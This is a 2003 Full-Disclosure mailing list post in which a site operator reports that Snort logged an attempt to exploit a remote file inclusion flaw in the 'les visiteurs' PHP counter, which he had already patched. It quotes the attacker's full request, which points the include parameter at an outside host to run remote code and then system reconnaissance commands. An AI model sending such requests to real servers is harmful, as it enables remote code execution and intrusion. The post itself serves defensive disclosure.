[Full-Disclosure] file inclusion (les visiteurs)
Evert Daman
evert at digipix.org
Mon Dec 1 10:03:59 GMT 2003
last night snort detected this request:
GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
because i patched 'les visiteurs' as described by 'matthieu peschaud'
on bugtraq on the 26 of october nothing happend, but it looks like someone
is trying to exploit this bug.
just want to mention it to this wonderfull list :)
kind regards,
Evert
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031201/4d2b16e7/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.